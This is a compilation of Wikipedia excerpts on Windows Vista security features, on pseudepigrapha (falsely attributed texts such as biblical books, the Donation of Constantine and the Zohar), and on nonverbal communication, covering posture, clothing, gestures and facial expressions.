Windows Vista can authenticate user accounts using smart cards or a combination of passwords and smart cards (two-factor authentication). Windows Vista can also use smart cards to store EFS keys. This ensures that encrypted files are accessible only as long as the smart card is physically available. If smart cards are used for logon, EFS operates in a single sign-on mode, where it uses the logon smart card for file encryption without further prompting for the PIN.
Fast User Switching, which was limited to workgroup computers on Windows XP, can now also be enabled for computers joined to a domain, starting with Windows Vista. Windows Vista also includes authentication support for the read-only domain controllers introduced in Windows Server 2008.
Windows Vista features an update to the crypto API known as Cryptography API: Next Generation (CNG). The CNG API is a user-mode and kernel-mode API that includes support for elliptic curve cryptography (ECC) and a number of newer algorithms that are part of the National Security Agency (NSA) Suite B. It is extensible, featuring support for plugging custom cryptographic APIs into the CNG runtime. It also integrates with the smart card subsystem by including a Base CSP module which implements all the standard backend cryptographic functions that developers and smart card manufacturers need, so that they do not have to write complex CSPs. The Microsoft certificate authority can issue ECC certificates, and the certificate client can enroll and validate ECC- and SHA-2-based certificates.
Revocation improvements include native support for the Online Certificate Status Protocol (OCSP), providing real-time certificate validity checking, CRL prefetching, and CAPI2 diagnostics. Certificate enrollment is wizard-based, allows users to input data during enrollment, and provides clear information on failed enrollments and expired certificates. CertEnroll, a new COM-based enrollment API, replaces the XEnroll library for flexible programmability. Credential roaming capabilities replicate Active Directory key pairs, certificates, and credentials stored in Stored User Names and Passwords within the network.
Windows Vista introduces Network Access Protection (NAP), which ensures that computers connecting to or communicating with a network conform to a required level of system health as set by the administrator of a network. Depending on the policy set by the administrator, computers which do not meet the requirements will either be warned and granted access, allowed access to limited network resources, or denied access completely. NAP can also optionally provide software updates to a non-compliant computer so it can upgrade itself to the level required to access the network, using a Remediation Server. A conforming client is given a Health Certificate, which it then uses to access protected resources on the network.
A Network Policy Server, running Windows Server 2008, acts as the health policy server, and clients need to use Windows XP SP3 or later. A VPN server, RADIUS server, or DHCP server can also act as the health policy server.
A number of specific security and reliability changes have been made.
https://en.wikipedia.org/wiki/Security_and_safety_features_new_to_Windows_Vista
A pseudepigraph (also anglicized as "pseudepigraphon") is a falsely attributed work, a text whose claimed author is not the true author, or a work whose real author attributed it to a figure of the past. The name of the author to whom the work is falsely attributed is often prefixed with the particle "pseudo-",[1] such as, for example, "Pseudo-Aristotle" or "Pseudo-Dionysius": these terms refer to the anonymous authors of works falsely attributed to Aristotle and Dionysius the Areopagite, respectively.
In biblical studies, the term pseudepigrapha can refer to an assorted collection of Jewish religious works thought to be written c. 300 BCE to 300 CE. They are distinguished by Protestants from the deuterocanonical books (Catholic and Orthodox) or Apocrypha (Protestant), the books that appear in extant copies of the Septuagint in the fourth century or later[2] and in the Vulgate, but not in the Hebrew Bible or in Protestant Bibles.[3] The Catholic Church distinguishes only between the deuterocanonical and all other books; the latter are called biblical apocrypha, which in Catholic usage includes the pseudepigrapha.[citation needed] In addition, two books considered canonical in the Orthodox Tewahedo churches, the Book of Enoch and the Book of Jubilees, are categorized as pseudepigrapha from the point of view of Chalcedonian Christianity.[citation needed]
In addition to the sets of works generally agreed to be non-canonical, scholars also apply the term to canonical works that make a direct claim of authorship, yet whose authorship is doubted. For example, the Book of Daniel is considered by some to have been written in the 2nd century BCE, 400 years after the prophet Daniel lived, and thus the work is pseudepigraphic.[4][5] A New Testament example might be the book of 2 Peter, considered by some to be written approximately 80 years after Saint Peter's death. Early Christians, such as Origen, harbored doubts as to the authenticity of the book's authorship.[6]
The term has also been used by Quranist Muslims to describe hadiths: Quranists claim that most hadiths are fabrications[7] created in the 8th and 9th century CE and falsely attributed to the Islamic prophet Muhammad.[8]
The word pseudepigraph derives from the Greek ψευδής (pseudḗs, "false") and ἐπιγραφή (epigraphḗ, "name", "inscription", or "ascription"); taken together, the term means "false superscription or title"[9] (see the related epigraphy). The plural of "pseudepigraph" (sometimes Latinized as "pseudepigraphon" or "pseudepigraphum") is "pseudepigrapha".
When a text is shown to have been falsely attributed to a particular author, and the true identity of the author is not known, the author can be referred to by a combination of "pseudo-" and the traditional author's name. For example, the Armenian History has been falsely attributed to the seventh-century Armenian historian Sebeos, and its author is therefore called Pseudo-Sebeos.[10]
Scholars have identified seven levels of authenticity, organized in a hierarchy ranging from literal authorship, meaning written in the author's own hand, to outright forgery.[11]
In biblical studies, pseudepigrapha refers particularly to works which purport to be written by noted authorities in either the Old and New Testaments or by persons involved in Jewish or Christian religious study or history. These works can also be written about biblical matters, often in such a way that they appear to be as authoritative as works which have been included in the many versions of the Judeo-Christian scriptures. Eusebius indicates this usage dates back at least to Serapion of Antioch, whom Eusebius records[12] as having said: "But those writings which are falsely inscribed with their name (ta pseudepigrapha), we as experienced persons reject...."
Many such works were also referred to as Apocrypha, which originally connoted "private" or "non-public": those that were not endorsed for public reading in the liturgy. An example of a text that is both apocryphal and pseudepigraphical is the Odes of Solomon.[13] It is considered pseudepigraphical because it was not actually written by Solomon but instead is a collection of early Christian (first- to second-century) hymns and poems, originally written not in Hebrew, and apocryphal because it was not accepted in either the Tanakh or the New Testament.
There is a tendency not to use the word pseudepigrapha for works later than about 300 CE when referring to biblical matters.[3]: 222–28 But the late-appearing Gospel of Barnabas, the Apocalypse of Pseudo-Methodius, the Pseudo-Apuleius (author of a fifth-century herbal ascribed to Apuleius), and the author traditionally referred to as "Pseudo-Dionysius the Areopagite" are classic examples of pseudepigraphy. In the fifth century the moralist Salvian published Contra avaritiam ("Against avarice") under the name of Timothy; the letter in which he explained to his former pupil, Bishop Salonius, his motives for doing so survives.[14]
The term pseudepigrapha is also commonly used to describe numerous works of Jewish religious literature written from about 300 BCE to 300 CE. Not all of these works are actually pseudepigraphical. It also refers to books of the New Testament canon whose authorship is misrepresented. Such works include the following:[3]
Various canonical works accepted as scripture have since been reexamined and considered by modern scholars from the 19th century onward as likely cases of pseudepigrapha. The Book of Daniel directly claims to be written by the prophet Daniel, yet there are strong reasons to believe it was not written until centuries after Daniel's death, such as references to the book only appearing from the 2nd century BCE onward. The book is an apocalypse wherein Daniel offers a series of predictions of the future, and is meant to reassure the Jews of the period that the tyrant Antiochus IV Epiphanes would soon be overthrown. By backdating the book to the 6th century BCE and providing a series of correct prophecies as to the history of the past 400 years, the authorship claim of Daniel would have strengthened a later author's predictions of the coming fall of the Seleucid Empire.[6][15]
Christian scholars traditionally maintain that nothing known to be pseudepigraphical was admitted to the New Testament canon.
The Catholic Encyclopedia notes,
The first four historical books of the New Testament are supplied with titles, which however ancient, do not go back to the respective authors of those sacred texts. The Canon of Muratori, Clement of Alexandria, and St. Irenaeus bear distinct witness to the existence of those headings in the latter part of the second century of our era. Indeed, the manner in which Clement (Strom. I, xxi), and St. Irenaeus (Adv. Haer. III, xi, 7) employ them implies that, at that early date, our present titles to the gospels had been in current use for some considerable time. Hence, it may be inferred that they were prefixed to the evangelical narratives as early as the first part of that same century. That however, they do not go back to the first century of the Christian era, or at least that they are not original, is a position generally held at the present day. It is felt that since they are similar for the four Gospels, although the same Gospels were composed at some interval from each other, those titles were not framed and consequently not prefixed to each individual narrative, before the collection of the four Gospels was actually made. Besides as well pointed out by Prof. Bacon, "the historical books of the New Testament differ from its apocalyptic and epistolary literature, as those of the Old Testament differ from its prophecy, in being invariably anonymous, and for the same reason. Prophecies, whether in the earlier or in the later sense, and letters, to have authority, must be referable to some individual; the greater his name, the better. But history was regarded as common possession. Its facts spoke for themselves. Only as the springs of common recollection began to dwindle, and marked differences to appear between the well-informed and accurate Gospels and the untrustworthy ... become worth while for the Christian teacher or apologist to specify whether the given representation of the current tradition was 'according to' this or that special compiler, and to state his qualifications". It thus appears that the present titles of the Gospels are not traceable to the Evangelists themselves.[16]
However, agnostic biblical scholar Bart D. Ehrman holds that only seven of Paul's epistles are convincingly genuine, and that all of the other 20 books in the New Testament appear to be written by unknown people who were not the well-known biblical figures to whom the early Christian leaders originally attributed authorship.[7] The earliest and best manuscripts of Matthew, Mark, Luke, and John were all written anonymously.[17] Furthermore, the books of Acts, Hebrews, 1 John, 2 John, and 3 John were also written anonymously.[17]
Thirteen New Testament letters are attributed to Paul and are still considered by Christians to carry Paul's authority. These letters are part of the Christian Bible and are foundational for the Christian Church. Therefore, letters which some claim to be pseudepigraphic are not considered any less valuable to Christians.[18]
Authorship of 6 out of the 13 canonical epistles of Paul has been questioned by both Christian and non-Christian biblical scholars.[19] These are the Epistle to the Ephesians, Epistle to the Colossians, Second Epistle to the Thessalonians, First Epistle to Timothy, Second Epistle to Timothy, and Epistle to Titus. These six books are referred to by sceptical scholars such as Bart Ehrman as "deutero-Pauline letters", meaning they hold "secondary" standing in the corpus of Paul's writings, on the grounds of proposed evidence that they could not have been written by Paul, despite internal attribution to Paul. Those known as the "Pastoral Epistles" (1 Timothy, 2 Timothy, and Titus) are all so similar that they are thought to have been written by the same author, whether by Paul himself or by someone writing in Paul's name.[7]
Seven New Testament letters are attributed to several apostles, such as Saint Peter, John the Apostle, and Jesus's brothers James and Jude.
Three of the seven letters are anonymous. These three have traditionally been attributed to John the Apostle, the son of Zebedee and one of the Twelve Apostles of Jesus. Consequently, these letters have been labelled the Johannine epistles, despite the fact that none of the epistles mentions any author. Most modern scholars believe the author is not John the Apostle, but there is no scholarly consensus for any particular historical figure (see Authorship of the Johannine works).[20][21]
Two of the letters claim to have been written or issued by Simon Peter, one of the Twelve Apostles of Jesus. Therefore, they have traditionally been called the Petrine epistles. However, most modern scholars agree the second epistle was probably not written by Peter, because it appears to have been written in the early 2nd century, long after Peter had died. Yet opinions on the first epistle are more divided; many scholars do think this letter is authentic.[22]
In one epistle, the author only calls himself James (Ἰάκωβος Iákobos). It is not known which James this is supposed to be. There are several different traditional Christian interpretations of other New Testament texts which mention a James, brother of Jesus. However, most modern scholars tend to reject this line of reasoning, since the author himself does not indicate any familial relationship with Jesus. A similar problem presents itself with the Epistle of Jude (Ἰούδας Ioudas): the writer names himself a brother of James (ἀδελφὸς δὲ Ἰακώβου adelphos de Iakóbou), but it is not clear which James is meant. According to some Christian traditions, this is the same James as the author of the Epistle of James, who was allegedly a brother of Jesus; and so, this Jude should also be a brother of Jesus, despite the fact he does not indicate any such thing in his text.[22]
The Gospel of Peter[23] and the attribution to Paul of the Epistle to the Laodiceans are both examples of pseudepigrapha that were excluded from the New Testament canon.[24] They are often referred to as New Testament apocrypha. Further examples of New Testament pseudepigrapha include the Gospel of Barnabas[25] and the Gospel of Judas, which begins by presenting itself as "the secret account of the revelation that Jesus spoke in conversation with Judas Iscariot".[26]
The Vision of Ezra is an ancient apocryphal text purportedly written by the biblical scribe Ezra. The earliest surviving manuscripts, composed in Latin, date to the 11th century CE, although textual peculiarities strongly suggest that the text was originally written in Greek. Like the Greek Apocalypse of Ezra, the work is clearly Christian, and features several apostles being seen in heaven. However, the text is significantly shorter than the Apocalypse.
The Donation of Constantine is a forged Roman imperial decree by which the 4th-century emperor Constantine the Great supposedly transferred authority over Rome and the western part of the Roman Empire to the Pope. Composed probably in the 8th century, it was used, especially in the 13th century, in support of claims of political authority by the papacy.[27] Lorenzo Valla, an Italian Catholic priest and Renaissance humanist, is credited with first exposing the forgery with solid philological arguments in 1439–1440,[28] although the document's authenticity had been repeatedly contested since 1001.[27]
In Russian history, in 1561 Muscovites supposedly received a letter from the Patriarch of Constantinople which asserted the right of Ivan the Terrible to claim the title of Tsar. This, too, turned out to be false.[29] While earlier Russian monarchs had on some occasions used the title "Tsar", Ivan the Terrible, previously known as "Grand Prince of all the Russias", was the first to be formally crowned as Tsar of All Rus (Russian: Царь Всея Руси). This was related to Russia's growing ambitions to become an Orthodox "Third Rome" after the Fall of Constantinople, for which the supposed approval by the Patriarch added weight.[30][31]
The Anaphora of Mar Nestorius, employed in the Eastern Churches, is attributed to Nestorius, but its earliest manuscripts are in Syriac, which calls its Greek authorship into question.[32][33]
The Zohar (Hebrew: זֹהַר, lit. "Splendor" or "Radiance"), the foundational work in the literature of Jewish mystical thought known as Kabbalah,[34] first appeared in Spain in the 13th century, and was published by a Jewish writer named Moses de León. De León ascribed the work to Shimon bar Yochai ("Rashbi"), a rabbi of the 2nd century during the Roman persecution[35] who, according to Jewish legend,[36][37] hid in a cave for thirteen years studying the Torah and was inspired by the Prophet Elijah to write the Zohar. This accords with the traditional claim by adherents that Kabbalah is the concealed part of the Oral Torah. Modern academic analysis of the Zohar, such as that by the 20th-century religious historian Gershom Scholem, has theorized that de León was the actual author, as textual analysis points to a medieval Spanish Jewish writer rather than one living in Roman-ruled Palestine.
Conrad Celtes, a noted German humanist scholar and poet of the German Renaissance, collected numerous Greek and Latin manuscripts in his function as librarian of the Imperial Library in Vienna. In a 1504 letter to the Venetian publisher Aldus Manutius,[38] Celtes claimed to have discovered the missing books of Ovid's Fasti. However, it turned out that the purported Ovid verses had actually been composed by an 11th-century monk and were known to the Empire of Nicaea according to William of Rubruck. Even so, many contemporary scholars believed Celtes and continued to write about the existence of the missing books until well into the 17th century.[39]
Pseudepigraphy has been employed as a metafictional technique. Authors who have made notable use of this device include James Hogg (The Private Memoirs and Confessions of a Justified Sinner), Thomas Carlyle (Sartor Resartus), Jorge Luis Borges ("An Examination of the Works of Herbert Quain"; "Pierre Menard, Author of the Quixote"), Vladimir Nabokov (Pale Fire), Stanislaw Lem (A Perfect Vacuum; Imaginary Magnitude), Roberto Bolaño (Nazi Literature in the Americas), and Stefan Heym (The Lenz Papers).
Edgar Rice Burroughs also presented many of his works – including the most well-known, the Tarzan books – as pseudepigrapha, prefacing each book with a detailed introduction presenting the supposed actual author, with Burroughs himself pretending to be no more than the literary editor. J. R. R. Tolkien in The Lord of the Rings presents that story and The Hobbit as translated from the fictional Red Book of Westmarch, written by characters within the novels. The twelve books of The Flashman Papers series by George MacDonald Fraser similarly pretend to be transcriptions of the papers left by an "illustrious Victorian soldier", each volume prefaced by a long semi-scholarly Explanatory Note stating that "additional packets of Flashman's papers have been found and are here presented to the public". A similar device was used by Ian Fleming in The Spy Who Loved Me and by various other writers of popular fiction.
Source: https://en.wikipedia.org/wiki/Pseudepigrapha
Nonverbal communication is the transmission of messages or signals through a nonverbal platform such as eye contact (oculesics), body language (kinesics), social distance (proxemics), touch (haptics), voice (prosody and paralanguage), physical environments/appearance, and use of objects. When communicating, nonverbal channels are used as a means to convey messages or signals, which others then interpret.[1] The study of nonverbal communication started in 1872 with the publication of The Expression of the Emotions in Man and Animals by Charles Darwin. Darwin began to study nonverbal communication as he noticed the interactions between animals such as lions, tigers, and dogs, and realized they also communicated by gestures and expressions.[2] For the first time, nonverbal communication was studied and its relevance noted. Today, scholars argue that nonverbal communication can convey more meaning than verbal communication.[3]
In the same way that speech incorporates nonverbal components, collectively referred to as paralanguage and encompassing voice quality, rate, pitch, loudness, and speaking style, nonverbal communication also encompasses facets of one's voice. Elements such as tone, inflection, emphasis, and other vocal characteristics contribute significantly to nonverbal communication, adding layers of meaning and nuance to the conveyed message.[4] However, much of the study of nonverbal communication has focused on interaction between individuals,[5] where it can be classified into three principal areas: environmental conditions where communication takes place, physical characteristics of the communicators, and behaviors of communicators during interaction.
Nonverbal communication involves the conscious and unconscious processes of encoding and decoding. Encoding is defined as our ability to express emotions in a way that can be accurately interpreted by the receiver(s). Decoding is called "nonverbal sensitivity", defined as the ability to take this encoded emotion and interpret its meanings accurately to what the sender intended. Encoding is the act of generating information such as facial expressions, gestures, and postures. Encoding information utilizes signals which we may think to be universal. Decoding is the interpretation of information from received sensations given by the encoder. Culture plays an important role in nonverbal communication, and it is one aspect that helps to influence how we interact with each other. In many Indigenous American communities, nonverbal cues and silence hold immense importance in deciphering the meaning of messages. In such cultures, the context, relationship dynamics, and subtle nonverbal cues play a pivotal role in communication and interpretation, impacting how learning activities are organized and understood.
According to some authors, nonverbal communication represents two-thirds of all communication.[6][7][8] Nonverbal communication can portray a message both vocally and with the correct body signals or gestures. Body signals comprise physical features, conscious and unconscious gestures and signals, and the mediation of personal space.[6] The wrong message can also be established if the body language conveyed does not match a verbal message. Paying attention to both verbal and nonverbal communication may leave the listener feeling lost, due to not being able to break down both at the same time. However, ignoring nonverbal communication altogether would cause the listener to miss up to 60% of the communication, according to experts.
Nonverbal communication strengthens a first impression in common situations like attracting a partner or in a business interview: impressions are on average formed within the first four seconds of contact.[6] First encounters or interactions with another person strongly affect a person's perception.[9] When the other person or group is absorbing the message, they are focused on the entire environment around them, meaning the other person uses all five senses in the interaction: 83% sight, 11% hearing, 3% smell, 2% touch and 1% taste.[10]
Many indigenous cultures use nonverbal communication in the integration of children at a young age into their cultural practices. Children in these communities learn through observing and pitching in, with nonverbal communication being a key aspect of observation.
According to Judee K. Burgoon et al., further reasons for the importance of non-verbal communication are:
Nonverbal communication encompasses a diverse range of signals that go beyond spoken language, such as gestures, facial expressions, body language, and vocal nuances like tone and rhythm. These cues carry subtle meanings critical to effective communication. For example, facial expressions are a powerful medium for conveying emotions, sometimes even through subtle microexpressions. These microexpressions are fleeting, involuntary facial movements that briefly reveal genuine feeling. They often occur in a fraction of a second, offering a brief insight into a person's genuine emotions, some of which may not be intentionally expressed and may diverge from their consciously stated feelings.[14] While some cues might be universally understood, others hold culture-specific significance, necessitating careful interpretation to prevent misunderstandings. Understanding the tone, pitch, cultural connotations of touch, and environmental influences enriches nonverbal communication, shaping our interactions. Recognizing that cultural norms influence the appropriateness of tone and pitch is crucial, as outlined by display rules. This underscores the significance of being culturally sensitive when interpreting nonverbal cues. In the context of intercultural communication, a deeper understanding of context culture becomes essential. Context culture significantly shapes how individuals communicate emotions and convey meaning through nonverbal signals. Being aware of these cultural nuances is fundamental for facilitating successful cross-cultural interactions and ensuring the accurate interpretation of nonverbal expressions.[15]
The understanding of tone, pitch, and cultural contexts in verbal communication complements nonverbal cues, offering a holistic grasp of interpersonal dynamics.[16] The harmony or discrepancy between verbal and nonverbal signals significantly impacts message clarity. In cultures where nonverbal cues are pivotal, incongruence between verbal and nonverbal elements can create confusion, while in cultures emphasizing explicit verbal communication, alignment between the two is essential for effective understanding.
Mastery of nonverbal signals extends beyond mere word comprehension, promoting cultural awareness and smoother interactions across diverse settings.[16] Proficiency in interpreting these cues not only aids in accurate understanding but also bolsters cross-cultural connections, enabling more profound exchanges. Adeptness in nonverbal communication is crucial for navigating social situations, decoding nuanced human behaviors, and establishing meaningful connections in various contexts, underlining the interconnectedness and importance of both verbal and nonverbal forms of communication.
Scientific research on nonverbal communication and behavior started in 1872 with the publication of Charles Darwin's book, The Expression of the Emotions in Man and Animals.[10] In the book, Darwin argued that all mammals, both humans and animals, showed emotion through facial expressions. He posed questions such as: "Why do our facial expressions of emotions take the particular forms they do?" and "Why do we wrinkle our nose when we are disgusted and bare our teeth when we are enraged?"[17] Darwin attributed these facial expressions to serviceable associated habits, which are behaviors that earlier in our evolutionary history had specific and direct functions.[17] For example, in a species that attacked by biting, baring the teeth was a necessary act before an assault, and wrinkling the nose reduced the inhalation of foul odors. In response to the question of why facial expressions persist even when they no longer serve their original purposes, Darwin offered a highly valued explanation: humans continue to make facial expressions because they have acquired communicative value throughout evolutionary history.[17] In other words, humans use facial expressions as external evidence of their internal state. Although The Expression of the Emotions in Man and Animals was not one of Darwin's most successful books in terms of its quality and overall impact in the field, his initial ideas started the abundance of research on the types, effects, and expressions of nonverbal communication and behavior.[18] Charles Darwin was also a renowned British naturalist and biologist best known for developing the theory of evolution through natural selection.[19]
Despite the introduction of nonverbal communication in the 1800s, the emergence of behaviorism in the 1920s paused further research on nonverbal communication.[18] Behaviorism is defined as the theory of learning that describes people's behavior as acquired through conditioning.[20] Behaviorists such as B. F. Skinner trained pigeons to engage in various behaviors to demonstrate how animals perform behaviors for rewards.[20]
While most psychology researchers were exploring behaviorism, the study of nonverbal communication as recorded on film began in 1955–56 at the Center for Advanced Study in Behavioral Sciences through a project which came to be called the Natural History of an Interview. The initial participants included two psychiatrists, Frieda Fromm-Reichman and Henry Brosin, two linguists, Norman A. McQuown and Charles Hockett, and also two anthropologists, Clyde Kluckhohn and David M. Schneider (these last two withdrew by the end of 1955, and did not participate in the major group project). In their place, two other anthropologists, Ray Birdwhistell, already then known as the founder of kinesics, the study of body motion communication,[21] and Gregory Bateson, known more generally as a human communication theorist, both joined the team in 1956. Albert Scheflen and Adam Kendon were among those who joined one of the small research teams continuing research once the year at CASBS ended. The project analyzed a film made by Bateson, using an analytic method called at the time natural history, and later, mostly by Scheflen, context analysis. The result remained unpublished, as it was enormous and unwieldy, but it was available on microfilm by 1971.[22] The method involves transcribing filmed or videotaped behavior in excruciating detail, and was later used in studying the sequence and structure of human greetings, social behaviors at parties, and the function of posture during interpersonal interaction.[23][24][25][26]
Research on nonverbal communication rocketed during the mid-1960s by a number of psychologists and researchers. Michael Argyle and Janet Dean Fodor, for example, studied the relationship between eye contact and conversational distance. Ralph V. Exline examined patterns of looking while speaking and looking while listening.[18] Eckhard Hess produced several studies pertaining to pupil dilation that were published in Scientific American. Robert Sommer studied the relationship between personal space and the environment.[18] Robert Rosenthal discovered that expectations made by teachers and researchers can influence their outcomes, and that subtle, nonverbal cues may play an important role in this process.[18] Albert Mehrabian studied the nonverbal cues of liking and immediacy. By the 1970s, a number of scholarly volumes in psychology summarized the growing body of research, such as Shirley Weitz's Nonverbal Communication and Marianne LaFrance and Clara Mayo's Moving Bodies.[18] Popular books included Body Language (Fast, 1970), which focused on how to use nonverbal communication to attract other people, and How to Read a Person Like a Book (Nierenberg & Calero, 1971), which examined nonverbal behavior in negotiation situations.[18] The journal Environmental Psychology and Nonverbal Behavior was founded in 1976.[27]
In 1970, Argyle hypothesized that although spoken language is used for communicating the meaning of events external to the person communicating, nonverbal codes are used to create and strengthen interpersonal relationships.[28] When someone wishes to avoid conflicting or embarrassing events during communication, the hypothesis holds that it is proper and correct to communicate attitudes towards others non-verbally instead of verbally.[29] Along with this philosophy, Michael Argyle also found and concluded in 1988 that there are five main functions of nonverbal body behavior and gestures in human communications: self-presentation of one's whole personality, rituals and cultural greetings, expressing interpersonal attitudes, expressing emotions, and accompanying speech in managing the cues set in the interactions between the speaker and the listener.[28]
It takes just one-tenth of a second for someone to judge and make a first impression. According to a study from Princeton University, this short amount of time is enough for a person to determine several attributes about an individual. These attributes included "attractiveness, likeability, trustworthiness, competence, and aggressiveness." A first impression is a lasting non-verbal communicator. The way a person portrays themselves on the first encounter is a non-verbal statement to the observer. Presentation can include clothing and other visible attributes such as facial expressions or facial traits in general. Negative impressions can also be based on presentation and on personal prejudice. First impressions, although sometimes misleading, can in many situations be an accurate depiction of others.[30]
In terms of culture, collectivists have a harder time changing their first impressions because they place much more emphasis on context and need additional time when faced with new cues, as each view may be correct in some contexts.[31] Moreover, Fang et al. acknowledged that first impressions are less likely to change in Asian cultures because they value cohesiveness and consensus, and so will not sacrifice group cohesiveness for the sake of changing a first impression once consensus has been reached.
Posture is a nonverbal cue associated with body positioning, and both are used as sources of information about an individual's characteristics, attitudes, and feelings about themselves and other people.[32] There are many different types of body positioning to portray certain postures, including slouching, towering, legs spread, jaw thrust, shoulders forward, and arm crossing. The posture or bodily stance exhibited by individuals communicates a variety of messages, whether good or bad. A study, for instance, identified around 200 postures that are related to maladjustment and withholding of information.[32]
Posture can be used to determine a participant's degree of attention or involvement, the difference in status between communicators, and the level of fondness a person has for the other communicator, depending on body "openness".[33]: 9 It can also be effectively used as a way for an individual to convey a desire to increase, limit, or avoid interaction with another person.[34] Studies investigating the impact of posture on interpersonal relationships suggest that mirror-image congruent postures, where one person's left side is parallel to the other person's right side, lead to favorable perception of communicators and positive speech; a person who displays a forward lean or decreases a backward lean also signifies positive sentiment during communication.[35]
Posture can be situation-relative; that is, people will change their posture depending on the situation they are in.[36] This can be demonstrated in the case of relaxed posture when an individual is within a nonthreatening situation and the way one's body tightens or becomes rigid when under stress.[37]
Clothing is one of the most common forms of non-verbal communication. The study of clothing and other objects as a means of non-verbal communication is known as artifactics[38] or objectics.[39] The types of clothing that an individual wears convey nonverbal cues about their personality, background and financial status, and how others will respond to them.[10] An individual's clothing style can demonstrate their culture, mood, level of confidence, interests, age, authority, and values/beliefs.[40] For instance, Jewish men may wear a yarmulke to outwardly communicate their religious belief. Similarly, clothing can communicate what nationality a person or group is; for example, in traditional festivities Scottish men often wear kilts to specify their culture.
Aside from communicating a person's beliefs and nationality, clothing can be used as a nonverbal cue to attract others. Men and women may shower themselves with accessories and high-end fashion to attract interested partners. In this case, clothing is a form of self-expression where people can flaunt their power, wealth, sex appeal, or creativity.[40] A study of the clothing worn by women attending discothèques, carried out in Vienna, Austria, showed that in certain groups of women (especially women who were without their partners), motivation for sex and levels of sexual hormones were correlated with aspects of their clothing, especially the amount of skin displayed and the presence of sheer clothing.[41]
The way one chooses to dress tells a lot about one's personality. The University of North Carolina studied how undergraduate women chose to dress and their personality types. The study showed that women dressed "primarily for comfort and practicality were more self-controlled, dependable, and socially well adjusted."[42] Women who did not like to stand out in a crowd typically had more conservative and traditional views and beliefs. Clothing, although non-verbal, tells people what the individual's personality is. The way a person dresses is typically rooted in deeper internal motivations such as emotions, experiences, and culture.[43] Clothing expresses who a person is, or who they want to be that day. It shows other people who they want to be associated with and where they fit in. Clothing can start relationships, because it clues other people in about the wearer.[42][43]
Nonverbal communication through clothing is very common among gangs. Gang members typically wear two or three colors to signify that they represent a particular neighborhood. Identifiers include baseball caps and hats with specific gang names and initials, worn backwards, tilted, or in certain colors, and bandanas worn around the head, shoulders, arms, or legs. Gang members frequently dress in hip-hop-inspired fashions, such as oversized pants worn below the waist (also known as "sagging"). Colored belts, colored shoes, and colored bandanas are all utilized as identifiers. Group colors and clothing are commonly used to represent affiliation.
Gestures may be made with the hands, arms or body, and also include movements of the head, face and eyes, such as winking, nodding, or rolling one's eyes. Although the study of gesture is still in its infancy, some broad categories of gestures have been identified by researchers. The most familiar are the so-called emblems or quotable gestures. These are conventional, culture-specific gestures that can be used as replacement for words, such as the hand wave used in western cultures for "hello" and "goodbye". A single emblematic gesture can have a very different significance in different cultural contexts, ranging from complimentary to highly offensive.[44] For a list of emblematic gestures, see List of gestures. There are some universal gestures like the shoulder shrug.[10]
Gestures can also be categorized as either speech independent or speech related. Speech-independent gestures are dependent upon culturally accepted interpretation and have a direct verbal translation.[33]: 9 A wave or a peace sign are examples of speech-independent gestures. Speech-related gestures are used in parallel with verbal speech; this form of nonverbal communication is used to emphasize the message that is being communicated. Speech-related gestures are intended to provide supplemental information to a verbal message, such as pointing to an object of discussion.
Gestures are not just for the audience; they can also help speakers elaborate their thoughts and process their ideas more fluently.[45] A simple example is giving someone directions: pointing left and right as you speak helps you remind yourself of the route. This not only helps the listeners but also helps you visualize the road as if you were travelling it.
Facial expressions, more than anything, serve as a practical means of communication. With all the various muscles that precisely control mouth, lips, eyes, nose, forehead, and jaw, human faces are estimated to be capable of more than ten thousand different expressions. This versatility makes non-verbals of the face extremely efficient and honest, unless deliberately manipulated. In addition, many of these emotions, including happiness, sadness, anger, fear, surprise, disgust, shame, anguish and interest are universally recognized.[46]
Displays of emotions can generally be categorized into two groups: negative and positive. Negative emotions usually manifest as increased tension in various muscle groups: tightening of jaw muscles, furrowing of forehead, squinting eyes, or lip occlusion (when the lips seemingly disappear). In contrast, positive emotions are revealed by the loosening of the furrowed lines on the forehead, relaxation of the muscles around the mouth, and widening of the eye area. When individuals are truly relaxed and at ease, the head will also tilt to the side, exposing the neck, the body's most vulnerable area. This is a high-comfort display, often seen during courtship, that is nearly impossible to mimic when tense or suspicious.[47]
Gestures can be subdivided into three groups:
Some hand movements are not considered to be gestures. They consist of manipulations either of the person or some object (e.g. clothing, pencils, eyeglasses)—the kinds of scratching, fidgeting, rubbing, tapping, and touching that people often do with their hands. These behaviors can show that a person is experiencing anxiety or feelings of discomfort, typical when the individual is not the one in control of the conversation or situation and therefore expresses this uneasiness subconsciously. Such behaviors are referred to as adapters. They may not be perceived as meaningfully related to the speech they accompany, but may serve as the basis for dispositional inferences about the speaker's emotions (nervous, uncomfortable, bored). These types of movements are believed to express the unconscious thoughts and feelings of a person, or those thoughts and emotions one is trying to consciously hide.
Other hand movements are gestures. They are movements with specific, conventionalized meanings called symbolic gestures. They are the exact opposite of adapters, since their meanings are intended to be communicated and they have a specific meaning both for the person who gives the gesture and the person who receives it. Familiar symbolic gestures include the "raised fist," "bye-bye," and "thumbs up." In contrast to adapters, symbolic gestures are used intentionally and serve a clear communicative function. Sign languages are highly developed systems of symbolic gesture. Some educators who work with deaf learners use a combination of cued speech and lip speaking and reading that helps deaf and hard-of-hearing (D/HH) individuals to code and decode words based on their phonetics.[48] In addition to the supplementary aspect of cues like location and movement, every culture has its own set of gestures, some of which are unique to that culture alone. For example, the phonological and lexical repository of D/HH individuals is highly dependent on their social background and richness of language.[48] Very similar gestures can have very different meanings across cultures. Symbolic gestures are usually used in the absence of speech but can also accompany speech.
The middle ground between adapters and symbolic gestures is occupied by conversational gestures. These hand movements do not refer to actions or words on their own, but accompany speech and are related to the speech they accompany. Conversational gestures are not seen in the absence of speech and are made only by the person who is speaking.
There are a few types of conversational gestures, specifically motor and lexical movements. Motor movements are those which are rhythmical and repetitive, do not have to be accompanied by anything spoken due to their simple meaning, and the speaker's hand usually sticks to one position. When paired with verbal communication, they can be used to stress certain syllables. An example of this would be pointing in a direction while saying, "That way." In this case, the "That" in the sentence would be stressed by the movement. Lexical movements are more complex; they are not rhythmic or repetitive, but rather lengthy and varied. An example of this would be giving elaborate directions to somewhere and pairing that with various hand movements to signal the various turns to take.
